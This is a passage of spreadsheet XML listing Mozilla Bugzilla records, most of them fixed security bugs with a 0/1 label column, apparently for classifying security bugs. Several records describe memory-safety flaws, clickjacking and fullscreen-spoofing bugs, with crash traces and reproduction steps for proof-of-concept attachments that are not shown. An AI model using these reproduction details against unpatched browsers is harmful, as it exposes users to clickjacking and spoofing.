Shadow bytes around the buggy address:
  0x0fe7b167fa50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0fe7b167fa60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0fe7b167fa70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0fe7b167fa80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0fe7b167fa90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=&gt;0x0fe7b167faa0: 00 00 00 00 00 00 00 00 00 00 00 00 00[07]fa fa
  0x0fe7b167fab0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0fe7b167fac0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0fe7b167fad0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0fe7b167fae0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0fe7b167faf0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Heap right redzone:      fb
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack partial redzone:   f4
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  ASan internal:           fe
==16794==ABORTING</t>
        </is>
      </c>
      <c r="X6463" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6464">
      <c r="A6464" t="n">
        <v>1243597</v>
      </c>
      <c r="B6464" t="inlineStr">
        <is>
          <t>2016-01-27 16:57:37 -0800</t>
        </is>
      </c>
      <c r="C6464" t="inlineStr">
        <is>
          <t>Use of uninitialised memory in [@graphite2::FileFace::get_table_fn]</t>
        </is>
      </c>
      <c r="D6464" t="inlineStr">
        <is>
          <t>2016-09-22 14:48:26 -0700</t>
        </is>
      </c>
      <c r="E6464" t="n">
        <v>1</v>
      </c>
      <c r="F6464" t="n">
        <v>1</v>
      </c>
      <c r="G6464" t="n">
        <v>3</v>
      </c>
      <c r="H6464" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6464" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6464" t="inlineStr">
        <is>
          <t>Graphics: Text</t>
        </is>
      </c>
      <c r="K6464" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L6464" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6464" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6464" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6464" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6464" t="inlineStr">
        <is>
          <t>[adv-main45+][adv-esr38.7+]</t>
        </is>
      </c>
      <c r="Q6464" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6464" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S6464" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T6464" t="n">
        <v>1</v>
      </c>
      <c r="U6464" t="n">
        <v>0</v>
      </c>
      <c r="V6464" t="n">
        <v>8</v>
      </c>
      <c r="W6464" t="inlineStr">
        <is>
          <t>Created attachment 8712964
call_stack.txt
This was found while fuzzing graphite2 1.3.5 (and is in 1.3.4)
This uninitialised memory can also end up being used in calls to malloc(), fread() and fseek()
NOTE: There is an additional issue at the end of the log, a use of uninitialised memory in graphite2::TtfUtil::CheckTable.</t>
        </is>
      </c>
      <c r="X6464" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6465">
      <c r="A6465" t="n">
        <v>1684837</v>
      </c>
      <c r="B6465" t="inlineStr">
        <is>
          <t>2021-01-04 01:38:35 -0800</t>
        </is>
      </c>
      <c r="C6465" t="inlineStr">
        <is>
          <t>requestPointerLock not called from short running user-generated event handler leads to Across Tab Website Clickjacking</t>
        </is>
      </c>
      <c r="D6465" t="inlineStr">
        <is>
          <t>2024-06-02 18:39:57 -0700</t>
        </is>
      </c>
      <c r="E6465" t="n">
        <v>1</v>
      </c>
      <c r="F6465" t="n">
        <v>1</v>
      </c>
      <c r="G6465" t="n">
        <v>3</v>
      </c>
      <c r="H6465" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6465" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6465" t="inlineStr">
        <is>
          <t>DOM: Events</t>
        </is>
      </c>
      <c r="K6465" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L6465" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M6465" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N6465" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O6465" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6465" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?][sec-survey][adv-main85+]</t>
        </is>
      </c>
      <c r="Q6465" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R6465" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S6465" t="inlineStr">
        <is>
          <t>86 Branch</t>
        </is>
      </c>
      <c r="T6465" t="n">
        <v>1</v>
      </c>
      <c r="U6465" t="n">
        <v>0</v>
      </c>
      <c r="V6465" t="n">
        <v>22</v>
      </c>
      <c r="W6465" t="inlineStr">
        <is>
          <t>Created attachment 9195173
clickjack-github.html
When page request for pointer lock that not called inside short running user-generated event handler, Firefox on Desktop unintentionally pass every mouse event into that page (even on another tab). Surprisingly I notice it affect entire tab session, so after opening the page (that requestpointerlock), then open another website on the same tab, it still pass every mouse event into that tab (even on another tab).
As a result, it is possible to clickjack the target website by opening target website into that tab. I've crafted the payload to demonstrate clickjacking on Github website.
It is nearly universal clickjacking, because when testing it able to clickjack on following popular website:
- https://www.google.com
- https://www.amazon.com
- https://bugzilla.mozilla.org
- https://www.facebook.com
- https://www.youtube.com
It's strange on some website (e.g. https://twitter.com) the mouse event no longer passed to that tab.
## Version affected:
- Firefox 84.0.1 (64-bit)
- Firefox Nightly 86.0a1 (2021-01-03) (64-bit)
## Version unaffected:
- Firefox 78.6.0esr (64-bit)
## Steps to reproduce:
1. Visit attached clickjack-github.html
2. Click "Start Clickjacking on Github"
3. Wait until Github fully loaded
4. Click "Let's start!"
5. Mouse click is pass to Github star button (If you're logged in, you've star or unstar the microsoft/vscode repositories, otherwise you'll redirected to Github login page)</t>
        </is>
      </c>
      <c r="X6465" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6466">
      <c r="A6466" t="n">
        <v>795281</v>
      </c>
      <c r="B6466" t="inlineStr">
        <is>
          <t>2012-09-28 04:55:36 -0700</t>
        </is>
      </c>
      <c r="C6466" t="inlineStr">
        <is>
          <t>Read after free in nsXPCWrappedJS::Release()</t>
        </is>
      </c>
      <c r="D6466" t="inlineStr">
        <is>
          <t>2014-05-27 12:25:31 -0700</t>
        </is>
      </c>
      <c r="E6466" t="n">
        <v>1</v>
      </c>
      <c r="F6466" t="n">
        <v>1</v>
      </c>
      <c r="G6466" t="n">
        <v>3</v>
      </c>
      <c r="H6466" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6466" t="inlineStr">
        <is>
          <t>Toolkit</t>
        </is>
      </c>
      <c r="J6466" t="inlineStr">
        <is>
          <t>Safe Browsing</t>
        </is>
      </c>
      <c r="K6466" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L6466" t="inlineStr">
        <is>
          <t>ARM</t>
        </is>
      </c>
      <c r="M6466" t="inlineStr">
        <is>
          <t>Android</t>
        </is>
      </c>
      <c r="N6466" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6466" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6466" t="inlineStr">
        <is>
          <t>[adv-track-main17-]</t>
        </is>
      </c>
      <c r="Q6466" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6466" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6466" t="inlineStr">
        <is>
          <t>Firefox 19</t>
        </is>
      </c>
      <c r="T6466" t="n">
        <v>1</v>
      </c>
      <c r="U6466" t="n">
        <v>0</v>
      </c>
      <c r="V6466" t="n">
        <v>38</v>
      </c>
      <c r="W6466" t="inlineStr">
        <is>
          <t>I've seen this twice now, on m-c startups on Android (4.0).  Sorry for no
line numbers.  I will try to get a line-numberised version.
I couldn't figure out what Component to select.
Thread 33:
Invalid read of size 4
   at 0x256A5922: nsXPCWrappedJS::Release() (in /data/data/org.mozilla.fennec_sewardj/cache/libxul.so)
   by 0x25A6AF8F: nsXPTCStubBase::Release() (in /data/data/org.mozilla.fennec_sewardj/cache/libxul.so)
   by 0x2579531D: UrlClassifierUpdateObserverProxy::Release() (in /data/data/org.mozilla.fennec_sewardj/cache/libxul.so)
   by 0x25159D15: nsRefPtr&lt;nsCaret&gt;::assign_with_AddRef(nsCaret*) (in /data/data/org.mozilla.fennec_sewardj/cache/libxul.so)
   by 0x2578F613: nsUrlClassifierDBServiceWorker::FinishUpdate() (in /data/data/org.mozilla.fennec_sewardj/cache/libxul.so)
   by 0x2500DDB9: nsRunnableMethodImpl&lt;void (nsPACMan::*)(), true&gt;::Run() (in /data/data/org.mozilla.fennec_sewardj/cache/libxul.so)
   by 0x25A5CB97: nsThread::ProcessNextEvent(bool, bool*) (in /data/data/org.mozilla.fennec_sewardj/cache/libxul.so)
   by 0x25A32F75: NS_ProcessNextEvent_P(nsIThread*, bool) (in /data/data/org.mozilla.fennec_sewardj/cache/libxul.so)
   by 0x25A5C98F: nsThread::ThreadFunc(void*) (in /data/data/org.mozilla.fennec_sewardj/cache/libxul.so)
   by 0x24D00C47: _pt_root (ptthread.c:156)
   by 0x482418F: __thread_entry (pthread.c:217)
   by 0x4823CC7: pthread_create (pthread.c:357)
   by 0xFFFFFFFF: ???
 Address 0x20a7b600 is 32 bytes inside a block of size 60 free'd
   at 0x4806184: free (vg_replace_malloc.c:446)
   by 0x24C10673: moz_free (mozalloc.cpp:51)
   by 0x256A6573: nsXPCWrappedJS::~nsXPCWrappedJS() (in /data/data/org.mozilla.fennec_sewardj/cache/libxul.so)
   by 0x256A593D: nsXPCWrappedJS::Release() (in /data/data/org.mozilla.fennec_sewardj/cache/libxul.so)
   by 0x2554D95F: nsProxyReleaseEvent::Run() (in /data/data/org.mozilla.fennec_sewardj/cache/libxul.so)
   by 0x25A5CB97: nsThread::ProcessNextEvent(bool, bool*) (in /data/data/org.mozilla.fennec_sewardj/cache/libxul.so)
   by 0x25A32F75: NS_ProcessNextEvent_P(nsIThread*, bool) (in /data/data/org.mozilla.fennec_sewardj/cache/libxul.so)
   by 0x2592B369: mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) (in /data/data/org.mozilla.fennec_sewardj/cache/libxul.so)
   by 0x25A87B2D: MessageLoop::RunInternal() (in /data/data/org.mozilla.fennec_sewardj/cache/libxul.so)
   by 0x25A87B3B: MessageLoop::RunHandler() (in /data/data/org.mozilla.fennec_sewardj/cache/libxul.so)
   by 0x25A87C3B: MessageLoop::Run() (in /data/data/org.mozilla.fennec_sewardj/cache/libxul.so)
   by 0x2588CC69: nsBaseAppShell::Run() (in /data/data/org.mozilla.fennec_sewardj/cache/libxul.so)
   by 0x2577A4C9: nsAppStartup::Run() (in /data/data/org.mozilla.fennec_sewardj/cache/libxul.so)
   by 0x24FAE369: XREMain::XRE_mainRun() (in /data/data/org.mozilla.fennec_sewardj/cache/libxul.so)
   by 0x24FB0821: XREMain::XRE_main(int, char**, nsXREAppData const*) (in /data/data/org.mozilla.fennec_sewardj/cache/libxul.so)
   by 0x24FB0A39: XRE_main (in /data/data/org.mozilla.fennec_sewardj/cache/libxul.so)</t>
        </is>
      </c>
      <c r="X6466" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6467">
      <c r="A6467" t="n">
        <v>1846685</v>
      </c>
      <c r="B6467" t="inlineStr">
        <is>
          <t>2023-08-02 00:05:16 -0700</t>
        </is>
      </c>
      <c r="C6467" t="inlineStr">
        <is>
          <t>Missing buffer size check in NEXT_PARAMS</t>
        </is>
      </c>
      <c r="D6467" t="inlineStr">
        <is>
          <t>2024-05-30 11:13:15 -0700</t>
        </is>
      </c>
      <c r="E6467" t="n">
        <v>1</v>
      </c>
      <c r="F6467" t="n">
        <v>1</v>
      </c>
      <c r="G6467" t="n">
        <v>3</v>
      </c>
      <c r="H6467" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6467" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6467" t="inlineStr">
        <is>
          <t>Graphics</t>
        </is>
      </c>
      <c r="K6467" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L6467" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M6467" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N6467" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6467" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6467" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?][adv-main118+][adv-esr115.3+]</t>
        </is>
      </c>
      <c r="Q6467" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6467" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S6467" t="inlineStr">
        <is>
          <t>119 Branch</t>
        </is>
      </c>
      <c r="T6467" t="n">
        <v>1</v>
      </c>
      <c r="U6467" t="n">
        <v>0</v>
      </c>
      <c r="V6467" t="n">
        <v>22</v>
      </c>
      <c r="W6467" t="inlineStr">
        <is>
          <t>Created attachment 9346862
ASAN.txt
|PathOps| is used by graphics rendering. In certain situations, |StreamToSink()|, |TransformedCopy()| and |AsCircle()| are called. They all use |NEXT_PARAMS| MACRO to parse |PathOps|[1],[2],[3]. There is no buffer size check before reading. It leads to out-of-bound Read[4].
[1]: https://searchfox.org/mozilla-central/source/gfx/2d/PathRecording.cpp#18 
[2]: https://searchfox.org/mozilla-central/source/gfx/2d/PathRecording.cpp#66
[3]: https://searchfox.org/mozilla-central/source/gfx/2d/PathRecording.cpp#115
[4]: https://searchfox.org/mozilla-central/source/gfx/2d/PathRecording.cpp#14 
REPRODUCE
Operating System: Windows
1.apply *patch.diff
2.visit index.html
*: Patch to emulate a compromised content process.
Crash State: see asan file</t>
        </is>
      </c>
      <c r="X6467" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6468">
      <c r="A6468" t="n">
        <v>1656741</v>
      </c>
      <c r="B6468" t="inlineStr">
        <is>
          <t>2020-08-01 22:47:42 -0700</t>
        </is>
      </c>
      <c r="C6468" t="inlineStr">
        <is>
          <t>Entering fullscreen without UI message showing</t>
        </is>
      </c>
      <c r="D6468" t="inlineStr">
        <is>
          <t>2024-05-30 10:17:22 -0700</t>
        </is>
      </c>
      <c r="E6468" t="n">
        <v>1</v>
      </c>
      <c r="F6468" t="n">
        <v>1</v>
      </c>
      <c r="G6468" t="n">
        <v>2</v>
      </c>
      <c r="H6468" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I6468" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J6468" t="inlineStr">
        <is>
          <t>Security</t>
        </is>
      </c>
      <c r="K6468" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L6468" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M6468" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N6468" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O6468" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6468" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?][post-critsmash-triage][adv-main83+][adv-esr78.5+]</t>
        </is>
      </c>
      <c r="Q6468" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R6468" t="inlineStr">
        <is>
          <t>S3</t>
        </is>
      </c>
      <c r="S6468" t="inlineStr">
        <is>
          <t>83 Branch</t>
        </is>
      </c>
      <c r="T6468" t="n">
        <v>1</v>
      </c>
      <c r="U6468" t="n">
        <v>0</v>
      </c>
      <c r="V6468" t="n">
        <v>45</v>
      </c>
      <c r="W6468" t="inlineStr">
        <is>
          <t>Created attachment 9167532
letsrepro.html
OS/Firefox version:
Works on Firefox 79.0 (64-bit) using Windows 10 Pro
Works on Nightly 81.0a1 (2020-08-01) (64-bit) using Windows 10 Pro
Works on Firefox 79.0 (64-bit) using macOS Catalina Version 10.15.5
Does _not_ work on Firefox 79.0 (64-bit) using Ubuntu 18.04.4 desktop
Repro: 
1. Host attached PoC HTML in an HTTP server (localhost will do, if other then make sure its HTTPS)
2. Open the hosted 'letsrepro.html' and click the anchor tag
Result:
Firefox enters full screen mode without the security UI saying you are entering fullscreen appearing.
Expected:
When entering full screen mode, the UI indicating so should always appear to prevent security concerns.
See Bug 1432856
Other info:
For some reason a WebSocket connection attempt has to happen first for this to work
If I remove 'new WebSocket("ws://nonexistent");' from the PoC, it does not work.</t>
        </is>
      </c>
      <c r="X6468" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6469">
      <c r="A6469" t="n">
        <v>1450033</v>
      </c>
      <c r="B6469" t="inlineStr">
        <is>
          <t>2018-03-29 10:48:49 -0700</t>
        </is>
      </c>
      <c r="C6469" t="inlineStr">
        <is>
          <t>Convert Job Filtering component to ReactJS</t>
        </is>
      </c>
      <c r="D6469" t="inlineStr">
        <is>
          <t>2018-10-15 15:32:32 -0700</t>
        </is>
      </c>
      <c r="E6469" t="n">
        <v>1</v>
      </c>
      <c r="F6469" t="n">
        <v>1</v>
      </c>
      <c r="G6469" t="n">
        <v>7</v>
      </c>
      <c r="H6469" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I6469" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J6469" t="inlineStr">
        <is>
          <t>Treeherder: Frontend</t>
        </is>
      </c>
      <c r="K6469" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L6469" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M6469" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N6469" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6469" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6469" t="inlineStr"/>
      <c r="Q6469" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6469" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6469" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T6469" t="n">
        <v>1</v>
      </c>
      <c r="U6469" t="n">
        <v>0</v>
      </c>
      <c r="V6469" t="n">
        <v>3</v>
      </c>
      <c r="W6469" t="inlineStr">
        <is>
          <t>Part of the overall conversion to ReactJS.
Estimated difficulty of 5</t>
        </is>
      </c>
      <c r="X6469" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6470">
      <c r="A6470" t="n">
        <v>1354559</v>
      </c>
      <c r="B6470" t="inlineStr">
        <is>
          <t>2017-04-07 07:41:30 -0700</t>
        </is>
      </c>
      <c r="C6470" t="inlineStr">
        <is>
          <t>Add base React UI to activity stream system add-on</t>
        </is>
      </c>
      <c r="D6470" t="inlineStr">
        <is>
          <t>2019-06-28 14:29:46 -0700</t>
        </is>
      </c>
      <c r="E6470" t="n">
        <v>1</v>
      </c>
      <c r="F6470" t="n">
        <v>1</v>
      </c>
      <c r="G6470" t="n">
        <v>2</v>
      </c>
      <c r="H6470" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I6470" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J6470" t="inlineStr">
        <is>
          <t>New Tab Page</t>
        </is>
      </c>
      <c r="K6470" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L6470" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M6470" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N6470" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6470" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6470" t="inlineStr">
        <is>
          <t>[export]</t>
        </is>
      </c>
      <c r="Q6470" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6470" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6470" t="inlineStr">
        <is>
          <t>Firefox 59</t>
        </is>
      </c>
      <c r="T6470" t="n">
        <v>1</v>
      </c>
      <c r="U6470" t="n">
        <v>0</v>
      </c>
      <c r="V6470" t="n">
        <v>3</v>
      </c>
      <c r="W6470" t="inlineStr">
        <is>
          <t>We need to add the base UI for activity stream, including the front-end bundle and Base React component.</t>
        </is>
      </c>
      <c r="X6470" t="n">
        <v>0</v>
      </c>
    </row>
  </sheetData>
  <pageMargins left="0.75" right="0.75" top="1" bottom="1" header="0.5" footer="0.5"/>
</worksheet>
</file>

<file path=docProps/app.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/extended-properties">
  <Application>Microsoft Excel</Application>
  <AppVersion>3.0</AppVersion>
</Properties>
</file>

<file path=docProps/core.xml><?xml version="1.0" encoding="utf-8"?>
<cp:coreProperties xmlns:cp="http://schemas.openxmlformats.org/package/2006/metadata/core-properties">
  <dc:creator xmlns:dc="http://purl.org/dc/elements/1.1/">openpyxl</dc:creator>
  <dcterms:created xmlns:dcterms="http://purl.org/dc/terms/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:type="dcterms:W3CDTF">2025-05-30T07:46:09Z</dcterms:created>
  <dcterms:modified xmlns:dcterms="http://purl.org/dc/terms/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:type="dcterms:W3CDTF">2025-05-30T07:46:09Z</dcterms:modified>
</cp:coreProperties>
</file>